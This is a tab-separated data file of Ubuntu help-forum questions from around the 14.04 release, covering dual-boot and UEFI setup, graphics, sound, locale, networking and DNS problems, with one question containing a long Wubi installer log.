516512	recovery mode - win7/ubuntu dualboot	i have a dualboot win7/ubuntu that i set up with wubi . i forgot both my username and password . a quick google search revealed that what i wanted to do was get into recovery mode , however i mashed both l and r shift to no avail - the menu shown here never came up . it 's probably worth mentioning that when i select ubuntu/win7 , the screen is different from other dualboot installs that i have seen - it says 'windows boot loader ' , and has the windows font .
516517	the mod / move to ubuntu touch	i was considering beta testing the ubuntu touch on a tablet as a hobby . for the linux apps i wanted to practice/study , but the guidelines say to only use nexus/4/7/10 tablets . they all have droid_4.2 thru 4.4 , btw . why does it matter which tablet i 'd choose to modify ?
516518	accents and tilde on firefox are not above letters	i 've recently installed kubuntu 14.04 64bits on my aspire 4752 , where i had a lubuntu 14.04 with /home partition . everything works fine , and i can type portuguese accents and tildes on other programs , including chrome , but in firefox , when i type an accent , it appears before the letter , so when i type the vowel , they are not together , like á , but like ´a . the ç , however , is working fine ( majority of internet complains about firefox and keyboard problems are about ç ) . tried different firefox extensions to type diacritics , and followed all google tutorials , but could n't solve it . is there some way to solve this problem ? edit : now i noticed that google chrome does it some times , but if i close it and open , it may do it or not randomly .
516521	wrong resolution using lg ultrawide 29ea73 with nvidia gtx 650 on ubuntu 14.04	i am trying to set the resolution of a lg 29ea73 ultrawide monitor to its native value ( 2560x1080 ) . but nvidia-settings pannel limit the resolution to only 1920x1080 . how can i solve this ? i searched all over the internet and did not find any solution . i have a nvidia gtx 650 card that is plugged to the monitor by a dual dvi cable . i am using ubuntu 14.04 64 bits and nvidia-331 drivers . thanks
516523	how do i make xubuntu stop blanking my screen	running xubuntu 14.04 trusty tahr . i have gone into light locker settings , and set blank screen to never and switch display off to never . i have gone into power settings and put the same settings in -- never for blank display and switch off display . and yet , the display switches off every 10 minutes when i 'm trying to watch a video . i have to hit the keyboard every few minutes to keep the screen on . what setting am i missing ?
516524	regarding transparency feature in gnome desktop environment in ubuntu 14.04	i am not able to make the terminal 's background transparent , even though have tried the option of going to edit- > profile preferences - > background - > transparent background . pls help me out .
516525	how can i install & run testdisk with usb	how can i install & run testdisk with usb ? when i boot from hdd , i can download & install testdisk from ubuntu software center ; but when i boot from usb ( for the purpose of recovering my ntfs drives that were accidentally dissolved into one ext4 by 14.04 ) i can not even find testdisk inside ubuntu software center . so can not run testdisk from terminal when i boot from usb . is booting from usb a must for trying to recover ntfs drives ? please help i am badly confused : ( : ` (
516526	linux full installation on usb ( windows 8.1 surface pro 1 ) uefi issue	i see a few similar questions but i have n't found one that had a solution yet for me . so , forgive me if this seems redundant . as the title implies , i want to install an ubuntu fork ( linuxlite 2.0 ) on to a usb that will be bootable in my surface pro . ( full install - not a livecd or persistent ) linuxlite 2.0 does not come 'out of the box ' with uefi compatibility . however , i have read that it can be made uefi bootable on hdd/sdd using ubuntu 's uefi support . i have n't read a specific case for a full usb install . one of the issues i am facing is that ( although the hardware and concept of the surface pro is phenomenal ) , if i may , windows 8.1 is terrible . i am working between two pcs to accomplish this . the surface pro - limitations : one usb port , usb port that doesnt like to create bootable usbs ( i can use the same software in my other pc and create it and use it but the surface pro will not make or run a uefi bootable livecd ) acer aspire one - windows 7 : does what the surface does n't , makes usbs that boot in windows 7 - however , painstakingly slow . between these two pcs i have only truly created one uefi capable usb os - tails 1.1 ( however , it is more of a livecd/persistant and not a true full install . but this proves that there is not faulty hardware when booting from the usb with uefi . oss that i have at my disposal now : 1 16gb sardu multi-boot with : ubuntu 14.04 x64 ubuntu 14.04 i386 linuxlive 2.0 x64 linuxlive 2.0 i386 *prefer to go with the x64 version but its incompatible with the acer . i cant run the live media 1 32gb usb ( where i want to install my os ) -gpt usb- sdc/ sdc1/ 150mb unformatted ( for making the bios/efi boot partitions ) sdc2/ 2gb swap space sdc3/ ~30gb linuxlite goes these are the posts i have found most helpful : https : //www.linuxliteos.com/forums/index.php ? topic=602.0 http : //superuser.com/questions/415198/make-uefi-gpt-bootloader-ssd-usb-linux-and-windows-work-together https : //help.ubuntu.com/community/uefi # converting_ubuntu_into_efi_mode i 've read these but i am still not getting the install methods for the boot/efi . nor do i understand the correct sequence . they differ in a universal 'correct ' way to make the boot partition . although , before i even get to that point : i 'm failing to see how to mount /boot/efi ( i can find only the flag for boot_grub . when i format the fat32 boot partition it i do n't see a mount option nor do i see a mount option after . ( in both livecd for ubuntu and linuxlite ) is there anyone who can 'break it down ' for me ? i feel like i am a bit lost with so much failure at uefi configuration . nothing against ubuntu ( in fact 13.04 is installed alongside windows 7 in the acer ) i am posting this on both forums .
516529	no sound on saved media playback	the sound works when playing streaming videos . however , there is no sound when playing saved/downloaded videos using media player or vlc . it started after i ran apt-get upgrade . the system is not muted . i am using ubuntu 14.04 lts on hp 14 notebook . some of the things i tried . force reload of alsa purged and reinstalled pulseaudio i also saw a post about an issue with a desktop and here 's what he did ( which i also tried ) : sudo apt-get -- reinstall install build-essential linux-headers-`uname -r` here 's what i got : reading package lists ... done building dependency tree reading state information ... done virtual packages like 'linux-headers ' ca n't be removed e : unable to locate package uname -r i think it 's a codec issue but i could be wrong .
516530	time warner wifi not working in ubuntu	i am new to ubuntu . ubuntu works well when i connect to router via ethernet and other wifi . but in times warner wifi i always get an authentication error .
516534	problems gaining root access and installing software due to authentication .	i have a laptop that had ubuntu installed , however though many ownerships , the pass word is lost , anyway of removing this absolute shite of an install block . every time i try to do something it asks for the stupid password , even after giving it its arbitrary password it processes to then tell me its incorrect . anybody wan na tell me how to remove it short of just uninstalling ubuntu , your comments might save this little samsung np-nc20 from a steel pickaxe though its heart .
516535	how can i use the installer to manually boot into a system without grub installed ?	for the sake of experimentation , i am trying to document a minimal procedure for a pure efi boot of 14.04 on a mac mini . this involves installing a base system ( using the mac-flavoured server install iso ) to the hard drive , but not installing grub to the mbr . grub is installed to the first partition of the hard drive , but until i manually set up the efi boot partition , the system will be unbootable . is there a way to use the bootloader on the usb installer to boot into the installed system manually ? i have access to `` advanced options '' ( ie . the bootloader command line ) on the installer , but i do n't know what bootloader it is , and so i ca n't find full documentation for it .
516537	frustrated again	i decided to try linux again ... ok -- -windows ... ..create a dvd for the download and use the suggested program to burn such . click link . that program virtually destroys ones computer with the added junk junk . even hijacks browsers . takes hours to get rid of the stuff if at all . safe mode helps some . mature ? maybe ok..burned an iso image . says your computer will boot from such . no luck . i tried the help me boot option and that even does not work . error message : : : : : : : : : : : 08-26 22:14 info root : === wubi 14.04 rev286 === 08-26 22:14 debug root : logfile is c : \users\david\appdata\local\temp\wubi-14.04-rev286.log 08-26 22:14 debug root : sys.argv = [ 'main.pyo ' , ' -- exefile= '' d : \\wubi.exe '' ' ] 08-26 22:14 debug commonbackend : data_dir=c : \users\david\appdata\local\temp\pyld855.tmp\data 08-26 22:14 debug windowsbackend : 7z=c : \users\david\appdata\local\temp\pyld855.tmp\bin\7z.exe 08-26 22:14 debug windowsbackend : startup_folder=c : \programdata\microsoft\windows\start menu\programs\startup 08-26 22:14 debug commonbackend : fetching basic info ... 08-26 22:14 debug commonbackend : original_exe=d : \wubi.exe 08-26 22:14 debug commonbackend : platform=win32 08-26 22:14 debug commonbackend : osname=nt 08-26 22:14 debug commonbackend : language=en_us 08-26 22:14 debug commonbackend : encoding=cp1252 08-26 22:14 debug windowsbackend : arch=amd64 08-26 22:14 debug commonbackend : parsing isolist=c : \users\david\appdata\local\temp\pyld855.tmp\data\isolist.ini 08-26 22:14 debug commonbackend : adding distro edubuntu-i386 08-26 22:14 debug commonbackend : adding distro kubuntu-amd64 08-26 22:14 debug commonbackend : none 08-26 22:39 debug tasklist : # # # # finished get_metalink 08-26 22:39 debug tasklist : new task get_file_md5 08-26 22:39 debug tasklist : # # # # running get_file_md5 ... 08-26 22:39 debug tasklist : # # # # finished get_file_md5 08-26 22:39 error commonbackend : invalid md5 for iso c : \ubuntu\install\installation.iso ( c4d4d037d7d0a05e8f526d18aa25fb5e ! = a4fc15313ef2a516bfbf83ce44281535 ) none 08-26 22:39 debug tasklist : # # # finished check_iso 08-26 22:39 debug tasklist : # # finished use_cd 08-26 22:39 debug tasklist : # # running extract_kernel ... 08-26 22:39 error tasklist : could not retrieve the required installation files traceback ( most recent call last ) : file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in __call__ file `` \lib\wubi\backends\common\backend.py '' , line 618 , in extract_kernel exception : could not retrieve the required installation files 08-26 22:39 debug tasklist : # cancelling tasklist 08-26 22:39 debug tasklist : # finished tasklist 08-26 22:39 error root : could not retrieve the required installation files traceback ( most recent call last ) : file `` \lib\wubi\application.py '' , line 58 , in run file `` \lib\wubi\application.py '' , line 130 , in select_task file `` \lib\wubi\application.py '' , line 205 , in run_cd_menu file `` \lib\wubi\application.py '' , line 122 , in select_task file `` \lib\wubi\application.py '' , line 228 , in run_cd_boot file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in __call__ file `` \lib\wubi\backends\common\backend.py '' , line 618 , in extract_kernel exception : could not retrieve the required installation files 08-26 22:41 info root : === wubi 14.04 rev286 === 08-26 22:41 debug root : logfile is c : \users\david\appdata\local\temp\wubi-14.04-rev286.log 08-26 22:41 debug root : sys.argv = [ 'main.pyo ' , ' -- exefile= '' c : \\ubuntu\\uninstall-wubi.exe '' ' ] 08-26 22:41 debug commonbackend : data_dir=c : \users\david\appdata\local\temp\pyl83de.tmp\data 08-26 22:41 debug windowsbackend : 7z=c : \users\david\appdata\local\temp\pyl83de.tmp\bin\7z.exe 08-26 22:41 debug windowsbackend : startup_folder=c : \programdata\microsoft\windows\start menu\programs\startup 08-26 22:41 debug commonbackend : fetching basic info ... 08-26 22:41 debug commonbackend : original_exe=c : \ubuntu\uninstall-wubi.exe 08-26 22:41 debug commonbackend : platform=win32 08-26 22:41 debug commonbackend : osname=nt 08-26 22:41 debug commonbackend : language=en_us 08-26 22:41 debug commonbackend : encoding=cp1252 08-26 22:41 debug windowsbackend : arch=amd64 08-26 22:41 debug commonbackend : parsing isolist=c : \users\david\appdata\local\temp\pyl83de.tmp\data\isolist.ini 08-26 22:41 debug commonbackend : adding distro edubuntu-i386 08-26 22:41 debug commonbackend : adding distro kubuntu-amd64 08-26 22:41 debug commonbackend : adding distro mythbuntu-i386 08-26 22:41 debug commonbackend : adding distro edubuntu-amd64 08-26 22:41 debug commonbackend : adding distro ubuntu studio-amd64 08-26 22:41 debug commonbackend : adding distro ubuntu-amd64 08-26 22:41 debug commonbackend : adding distro lubuntu-i386 08-26 22:41 debug commonbackend : adding distro ubuntu-i386 08-26 22:41 debug commonbackend : adding distro mythbuntu-amd64 08-26 22:41 debug commonbackend : adding distro kubuntu-i386 08-26 22:41 debug commonbackend : adding distro ubuntu studio-i386 08-26 22:41 debug commonbackend : adding distro lubuntu-amd64 08-26 22:41 debug windowsbackend : fetching host info ... 08-26 22:41 debug windowsbackend : registry_key=software\microsoft\windows\currentversion\uninstall\wubi 08-26 22:41 debug windowsbackend : windows version=vista 08-26 22:41 debug windowsbackend : windows_version2=windows vista ( tm ) home premium 08-26 22:41 debug windowsbackend : windows_sp=service pack 1 08-26 22:41 debug windowsbackend : windows_build=6001 08-26 22:41 debug windowsbackend : gmt=-5 08-26 22:41 debug windowsbackend : country=us 08-26 22:41 debug windowsbackend : timezone=america/new_york 08-26 22:41 debug windowsbackend : windows_username=david 08-26 22:41 debug windowsbackend : user_full_name=david 08-26 22:41 debug windowsbackend : user_directory=c : \users\david 08-26 22:41 debug windowsbackend : windows_language_code=1033 08-26 22:41 debug windowsbackend : windows_language=english 08-26 22:41 debug windowsbackend : processor_name=intel ( r ) pentium ( r ) dual cpu t3200 @ 2.00ghz 08-26 22:41 debug windowsbackend : bootloader=vista 08-26 22:41 debug windowsbackend : system_drive=drive ( c : hd 111863.894531 mb free ntfs ) 08-26 22:41 debug windowsbackend : drive=drive ( c : hd 111863.890625 mb free ntfs ) 08-26 22:41 debug windowsbackend : drive=drive ( d : cd 0.0 mb free cdfs ) 08-26 22:41 debug windowsbackend : uninstaller_path=c : \ubuntu\uninstall-wubi.exe 08-26 22:41 debug windowsbackend : previous_target_dir=c : \ubuntu 08-26 22:41 debug windowsbackend : previous_distro_name=ubuntu 08-26 22:41 debug windowsbackend : keyboard_id=67699721 08-26 22:41 debug windowsbackend : keyboard_layout=us 08-26 22:41 debug windowsbackend : keyboard_variant= 08-26 22:41 debug commonbackend : python locale= ( 'en_us ' , 'cp1252 ' ) 08-26 22:41 debug commonbackend : locale=en_us.utf-8 08-26 22:41 debug windowsbackend : total_memory_mb=1915.26171875 08-26 22:41 debug commonbackend : searching isos on usb devices 08-26 22:41 debug commonbackend : searching for local cds 08-26 22:41 debug distro : checking whether c : \users\david\appdata\local\temp\pyl83de.tmp is a valid ubuntu cd 08-26 22:41 debug distro : does not contain c : \users\david\appdata\local\temp\pyl83de.tmp\casper\filesystem.squashfs 08-26 22:41 debug distro : checking whether c : \users\david\appdata\local\temp\pyl83de.tmp is a valid ubuntu cd 08-26 22:41 debug distro : does not contain c : \users\david\appdata\local\temp\pyl83de.tmp\casper\filesystem.squashfs 08-26 22:41 debug distro : checking whether c : \users\david\appdata\local\temp\pyl83de.tmp is a valid kubuntu cd 08-26 22:41 debug distro : does not contain c : \users\david\appdata\local\temp\pyl83de.tmp\casper\filesystem.squashfs 08-26 22:41 debug distro : checking whether c : \users\david\appdata\local\temp\pyl83de.tmp is a valid kubuntu cd 08-26 22:41 debug distro : does not contain c : \users\david\appdata\local\temp\pyl83de.tmp\casper\filesystem.squashfs 08-26 22:41 debug distro : checking whether c : \users\david\appdata\local\temp\pyl83de.tmp is a valid mythbuntu cd 08-26 22:41 debug distro : does not contain c : \users\david\appdata\local\temp\pyl83de.tmp\casper\filesystem.squashfs 08-26 22:41 debug distro : checking whether c : \users\david\appdata\local\temp\pyl83de.tmp is a valid mythbuntu cd 08-26 22:41 debug distro : does not contain c : \users\david\appdata\local\temp\pyl83de.tmp\casper\filesystem.squashfs 08-26 22:41 debug distro : checking whether c : \users\david\appdata\local\temp\pyl83de.tmp is a valid edubuntu cd 08-26 22:41 debug distro : does not contain c : \users\david\appdata\local\temp\pyl83de.tmp\casper\filesystem.squashfs 08-26 22:41 debug distro : checking whether c : \users\david\appdata\local\temp\pyl83de.tmp is a valid edubuntu cd 08-26 22:41 debug distro : does not contain c : \users\david\appdata\local\temp\pyl83de.tmp\casper\filesystem.squashfs 08-26 22:41 debug distro : checking whether c : \users\david\appdata\local\temp\pyl83de.tmp is a valid lubuntu cd 08-26 22:41 debug distro : does not contain c : \users\david\appdata\local\temp\pyl83de.tmp\casper\filesystem.squashfs 08-26 22:41 debug distro : checking whether c : \users\david\appdata\local\temp\pyl83de.tmp is a valid lubuntu cd 08-26 22:41 debug distro : does not contain c : \users\david\appdata\local\temp\pyl83de.tmp\casper\filesystem.squashfs 08-26 22:41 debug distro : checking whether c : \users\david\appdata\local\temp\pyl83de.tmp is a valid ubuntu studio cd 08-26 22:41 debug distro : does not contain c : \users\david\appdata\local\temp\pyl83de.tmp\casper\filesystem.squashfs 08-26 22:41 debug distro : checking whether c : \users\david\appdata\local\temp\pyl83de.tmp is a valid ubuntu studio cd 08-26 22:41 debug distro : does not contain c : \users\david\appdata\local\temp\pyl83de.tmp\casper\filesystem.squashfs 08-26 22:41 debug distro : checking whether d : \ is a valid ubuntu cd 08-26 22:41 debug distro : does not contain d : \casper\vmlinuz.efi 08-26 22:41 debug distro : checking whether d : \ is a valid ubuntu cd 08-26 22:41 debug distro : parsing info from str=ubuntu 14.04.1 lts `` trusty tahr '' - release i386 ( 20140722.2 ) 08-26 22:41 debug distro : parsed info= { 'name ' : 'ubuntu ' , 'subversion ' : 'release ' , 'version ' : '14.04.1 ' , 'build ' : '20140722.2 ' , 'codename ' : 'trusty tahr ' , 'arch ' : 'i386 ' } 08-26 22:41 info distro : found a valid cd for ubuntu : d : \ 08-26 22:41 info root : running the uninstaller ... 08-26 22:41 info commonbackend : this is the uninstaller running 08-26 22:41 debug windowsfrontend : __init__ ... 08-26 22:41 debug windowsfrontend : on_init ... 08-26 22:41 info winuipage : appname=wubi , localedir=c : \users\david\appdata\local\temp\pyl83de.tmp\translations , languages= [ 'en_us ' , 'en ' ] 08-26 22:41 info windowsfrontend : operation cancelled 08-26 22:41 debug windowsfrontend : frontend.quit 08-26 22:41 debug windowsfrontend : frontend.on_quit 08-26 22:41 debug root : application.on_quit 08-26 22:41 info root : sys.exit sorry folks but it says to check this log file and i c/c/p struck out again..post too long ... above is the end ...
516539	how to install windows as a second os ?	i 've installed xubuntu 14 on my laptop . but now the laptop can not detect the windows installation disc . when i put in the disc and restart , nothing changed ; it still went directly into xubuntu without any option . i 'm sure nothing is wrong with bios since i have checked it many times . when i insert ubuntu installation disc and restart , it shows the options perfectly . what should i do in order to install windows on my laptop ?
516543	stuck in low-graphics mode , normal method not working	i just got a notification to take the ubuntu 14.04 update . what could go wrong , right ? i 'm stuck in low-graphics mode . it 's similar to this question . the problem is ctrl+alt+f1 does n't take me to a terminal . it takes me to a screen that says : initializing built-in extension xxxx loading extension gls loading extension etc etc `
516544	malformed line 59	i 've seen a bunch of post about malformed line but i ca n't understand how they are resolved or what needs to be changed and now i 'm getting another error message : ( gedit:2708 ) : gtk-warning ** : calling inhibit failed : gdbus.error : org.freedesktop.dbus.error.serviceunknown : the name org.gnome.sessionmanager was not provided by any .service files how can i resolve the malformed line issue and get rid of the new issue that is happening ? please use muggle words . i 'm a noob .
516545	beautiful screenblinking with i915	i 'm using ubuntu 14.04 lts 64bit on a laptop . the problem is that screen keeps blinking like rainbow . this is what happened on my laptop http : //www.youtube.com/watch ? v=moy4rdhi8sy my workaround was editing /etc/default/grub . grub_cmdline_linux_default= '' text i915.modeset=0 '' or i915.reset=false or i915.enable_hangcheck=false works too . but that was n't a perfect solution , because i ca n't adjust screen brightness and laptop becomes so slow when i play graphical games after that . so i want to know if there is a better solution . sudo lshw -c video *-display unclaimed description : vga compatible controller product : haswell-ult integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 09 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list configuration : latency=0 resources : memory : d0000000-d03fffff memory : c0000000-cfffffff ioport:4000 ( size=64 ) sudo lspci 00:00.0 host bridge : intel corporation haswell-ult dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation haswell-ult integrated graphics controller ( rev 09 ) 00:03.0 audio device : intel corporation haswell-ult hd audio controller ( rev 09 ) 00:04.0 signal processing controller : intel corporation device 0a03 ( rev 09 ) 00:14.0 usb controller : intel corporation lynx point-lp usb xhci hc ( rev 04 ) 00:16.0 communication controller : intel corporation lynx point-lp heci # 0 ( rev 04 ) 00:1b.0 audio device : intel corporation lynx point-lp hd audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation lynx point-lp pci express root port 1 ( rev e4 ) 00:1d.0 usb controller : intel corporation lynx point-lp usb ehci # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation lynx point-lp lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation lynx point-lp sata controller 1 [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation lynx point-lp smbus controller ( rev 04 ) 01:00.0 network controller : intel corporation wireless 7260 ( rev 6b ) i also tried intel-linux-graphics-installer , has no effects
516546	where are the config files for workspaces ?	i 've noticed in fedora , or suse , that the workspaces only move vertically , i was wondering where the config files are in ubuntu for gnome that control this functionality ?
516547	no sound on skype 4.3 lubuntu 14.04	new to linux just installed skype 4.3 on lubuntu 14.4 . there is no sound when i call skype echo , totally silent . i have sound if i play music or video files . i notice sound driver is version k1313.0-34-generic . earlier today the software updater said it could not read `` linux image 3.13.0-34generic as could not read 'dev/sdc' just wondering if two problems are connected . software updater now says system is up to date
516548	ca n't share the lan connection with windows 8.1	i have just installed ubuntu 14.04 on windows 8.1 by vmware . i connect to internet via usb 3.0 ethernet adapter due to the reason my notebook does n't lan jack . the thing is i do n't know how to share usb connection . adapter is called asix ax88179 -- usb3.0 to 10/100/1000m gigabit ethernet controller . i will appreciate for any kind help . edit : i have a bridged connection .
516549	use refind over gurb ( grub starting after refind )	so im dual-booting windows 7 and ubuntu 14.04 , both on a gpt partition type in a gigabyte hybrid uefi ( both were installed as uefi ) when i choose windows , it boots correctly but when choosing ubuntu it loads grub , i want to either hide grub or to use refind directly , have been looking a lot but haved no luck , i hope tou can help me . thanks
516551	usb devices are detected but not working	i have an acer ( tm5720 , 32bit , 2.3ghz , intel dual core t7500 ) laptop . i use a dell usb wired keyboard and and hp wired mouse . everything was working fine until this morning , i.e now keyboard and mouse are detected on shell when i use this command lsusb , but still they are n't working/functioning at all . i used these commands too - dmesg|tail and lspci ( i found the command on askubuntu.com itself ) .. but i do n't understand what i can achieve from them in regard to my problem . any help is greatly appreciated regards abhi p.s - space key also does n't work 20 % of time while typing.. though , it does , if i press it consistently for more than 5-8 seconds..
516553	ubuntu on external harddrive multiple computers	i do n't dual-boot . i 've been using ubuntu on my external hard drive for over a year with out any problems . i normally plug the drive into my laptop , asus ux31a . i noticed a consistent issue that occurs every time i plug in a different drive with a linux distro on it ( ubuntu , mint , etc ) . i get a message minimal bash-like line editing is supported . for the first word . tab lists possible command completions . anywhere else tab lists possible device or file complete . and this message will come up for both drives and prevent booting for both drives . my questions are : is this normal ? should only one linux-external-drive be used on 1 machine ? ( normal this message will come up after i plug in second linux-external-drive , i would have to fix by reinstalling linux on one of the drive using a live-cd and only use that drive on the machine that was used for the installation ) . can one linux-external-drive be used on multiple machines ? the reason i ask is that it seems like the drive will only work with my laptop ( which was used to install linux on the external drive ) and it will not boot on other machines . i 'm sorry for the confusing questions . i do n't know much of other ways to explain the issue . i wish there was a way to use multiple external drives on my laptop so i can use different distros without having to install multiple distros on one hard drive . the routine i use for installing on external hard drive is as follow : boot a live-usb on my laptop . create / boot partition on the external drive i want to install on . create / partition on the external-drive i want to install on . select sdb ( which is my external drive , where i want the boot partion to be ) . i want to make it clear that this will work fine as long as i do n't plug in a different linux-external-drive into my laptop . the minute i do that , i will get the message above and neither drive will boot . i 'm still learning info about grub and trying to understand more about the booting configurations in linux . i hope someone can enlighten me on the issue . thank you .
516555	where can i find grub bootloader script before the system started up ?	where can i find grub bootloader script before the system is started up ? i 'm running on vbox v4.3.12 r93733 .
516556	pentium t2390 dual core 3gb ram just installed 12.04 , should i change to 14.04 ?	had a 12.04 disk and installed on a vista laptop for a friend , did not realize till install that 14.04lts was available . should i burn a disk and reinstall 14.04 , upgrade or stick with 12.04 ?
516558	calling for executables not yet installed displays a message in german	calling any executable which is not yet installed results in a message which is not easy to understand : $ tcl der befehl \xbbtcl\xab wurde nicht gefunden , meinten sie vielleicht : befehl \xbbtel\xab aus dem paket \xbborville-write\xab ( universe ) befehl \xbbtc\xab aus dem paket \xbbiproute2\xab ( main ) befehl \xbbtcs\xab aus dem paket \xbbtcs\xab ( universe ) befehl \xbbtjl\xab aus dem paket \xbbpvm-examples\xab ( universe ) befehl \xbbcl\xab aus dem paket \xbbcl-launch\xab ( universe ) befehl \xbbecl\xab aus dem paket \xbbecl\xab ( universe ) befehl \xbbtcal\xab aus dem paket \xbbgcal\xab ( universe ) befehl \xbbmcl\xab aus dem paket \xbbmcl\xab ( universe ) befehl \xbbccl\xab aus dem paket \xbbcclive\xab ( universe ) befehl \xbbtbl\xab aus dem paket \xbbgroff-base\xab ( main ) befehl \xbbncl\xab aus dem paket \xbbncl-ncarg\xab ( universe ) befehl \xbbgcl\xab aus dem paket \xbbgcl\xab ( universe ) befehl \xbbtdl\xab aus dem paket \xbbtdl\xab ( universe ) befehl \xbbtcc\xab aus dem paket \xbbtcc\xab ( universe ) befehl \xbbtcm\xab aus dem paket \xbbtcm\xab ( universe ) tcl : befehl nicht gefunden . bogdanbiv @ bivub1404 : ~ $ which tcl bogdanbiv @ bivub1404 : ~ $ hgjkh hgjkh : befehl nicht gefunden . also what 's wrong with the hex characters ( \xbb and \xab ) . my system is kubuntu 14.04 , trusty : $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 14.04.1 lts release : 14.04 codename : trusty my system language is english , however i have some regional settings set for my country : $ locale locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory lang=en_ro.utf-8 language=en : de : ro : en lc_ctype= '' en_ro.utf-8 '' lc_numeric=en_ro.utf-8 lc_time=en_ro.utf-8 lc_collate= '' en_ro.utf-8 '' lc_monetary=en_ro.utf-8 lc_messages= '' en_ro.utf-8 '' lc_paper=en_ro.utf-8 lc_name=en_ro.utf-8 lc_address=en_ro.utf-8 lc_telephone=en_ro.utf-8 lc_measurement=en_ro.utf-8 lc_identification=en_ro.utf-8 lc_all= somehow i stumbled upon what may be some relevant information ( see more at http : //pastebin.com/4xgakzgl ) : command-not-found-version : 0.3 python-version : 3.4.0 final 0 update : i tried various locale repair tools : a popup appeared saying i have incomplete language support and offered to help . that was nice , but it achieved nothing . well , at least now , the messages in german are displayed correctly in utf and forcing english does work : $ language=en tcl no command 'tcl ' found , did you mean : # correct , this should be normal behaviour $ language=en : de : ro tcl der befehl »tcl« wurde nicht gefunden , meinten sie vielleicht : # this is german here is the output of locale as of now : lang=en_gb.utf-8 language=en : de : ro lc_ctype= '' en_gb.utf-8 '' lc_numeric=en_gb.utf-8 lc_time=en_gb.utf-8 lc_collate= '' en_gb.utf-8 '' lc_monetary=en_gb.utf-8 lc_messages=posix lc_paper=en_gb.utf-8 lc_name=en_gb.utf-8 lc_address=en_gb.utf-8 lc_telephone=en_gb.utf-8 lc_measurement=en_gb.utf-8 lc_identification=en_gb.utf-8 lc_all=
516566	is there a way to create domains and subdomains in apache like this ?	i 'm a web programmer that has finally been tasked with setting up a development server for in house development and testing . i 'm a novice when it comes to setting up a lamp server . i 've only ever managed to do the default lamp stack with `` tasksel '' , never managed to get multiple domains working properly . what i would like to know is , is it possible to drop a single config file for a single domain/subdomain in a directory in order to configure it ? i have a feeling this is how you use the directory /sites-available/ right ? any tips in the right direction are greatly appreciated .
516567	how long is an arp entry cached for ?	where can i find out how long arp table entries are cached ? i 'm running 13.10 . can i get this on the command line ?
516575	uninstall windows 8.1 to run ubuntu 14.04 as the single os on my laptop ?	from the beginning i had windows 8.1 installed on my laptop . then i installed ubuntu 14.04 alongside windows by shrinking a drive on windows and installing ubuntu by usb to the latter one . now i want to uninstall windows 8.1 to run ubuntu 14.04 as the single os on my laptop . if i uninstall windows 8.1 , do i still have ubuntu 14.04 on my boot options ? or i need to do something else ?
516576	what are present minimum hardware requirements 14.04 lts	searched the ubuntu site and the web and only came up with older version system requirements . could somebody please lead my to current minimums , and where to find them . seems like that info should be right up by the flavor button at download , so as to minimize folks attempting to install the latest version on the not so very latest machines , as i think i just spent many hours doing . mahalo
516582	could not instal nitroid kernel	i try to instal nitdroid on my n900 cellphone and i got this error while installing nitdroid kernel , '' creating item file for multiboot /var/lib/dpkg/info/ nitdroid-kernel-2.6.28-07.postinst : line 97 : can not create /etc/multiboot.d/11-nitdroid-mmcblk0p2-2.6.28.nit.07.item : nonexistent directory '' dpkg : error processing nitdroid-kernel-2.6.28-07 ( -- install ) : subprocess post installation script returned error exit status 2 errors were encountered while processing : nitdroid-kernel-2.6.28-07
516585	how to resolve the hard block issue in my wifi completely ?	my as us laptop has a hard block `` wifi '' issue , some how i find the command to resolve this issue , after entering the command and after suspending the system , the problem is resolved . the command i enter is as follows : '' lsmod | grep -e ath9k -e asus '' . but the problem is i have to enter this command each time as i restart ubuntu , any way to solve this problem completely ?
516586	custom theme sidebar	i 'm new to linux , and i recently installed ubuntu on my notebook with dual boot . so , i find the ubuntu normal theme ok , but i 'd rather have something different . i searched and found this one : http : //gnome-look.org/content/show.php/vertex+-+theme ? content=166318 . it 's working just fine , but my sidebar is still the orange one , really really ugly . is this right , or i installed it wrong ? i 'm using ubuntu 14.04 . if i did something wrong , please , help me fix it : c
516587	unable to use internet ( hosts unknown ) after upgrade from 12.04 to 14.04 - dns resolv.conf problem	i upgraded my pc two days ago from 12.04 ( desktop ) to 14.04 ( desktop ) . since then , i am unable to surf on the internet . more exactly , i have the connection ( wired ) but not host resolving . i have tried several things without succes : static and dynamic ip , dnsmasq commented out , ... if i use dhcp on other computers on the same network , i have no problem . on my ubuntu , i see no error but i am unable to surf nor to resolve any host name . for instance , i can ping to 192.168.2.1 and 8.8.8.8 ( configured as names servers ) but not to www.google.com nor google.com . nslookup fails as well ( 'host unreachable ' ) . after long searches , i found a problem in the '/etc/resolv.conf ' : if i do a 'cat /etc/resolv.conf ' , nothing is shown although it correctly points to '../run/resolvconf/resolv.conf ' . i then copied that regular file to '/etc/resolv/conf ' ( not recommended , i know ) and -bingo - everything runs fine . now the question is 'why does the symlink not work properly ' ?
516594	14.04 can not interact outside of main window	i am sure this is happening to others but i am not sure how to properly search for the problem . ubuntu randomly will not let me interact with the sidebar or let me access the menu bars . the current open application is still fully functional and i can save using ctrl-s but i need to log out in order to get back functionality of opening other apps or press the windows key and open a new instance of another application . is anyone familiar with this issue ? edit pc info : http : //www.cnet.com/products/hp-probook-6470b-14-core-i5-3210m-windows-7-pro-64-bit-4-gb-ram-500-gb-hdd-series/specs/
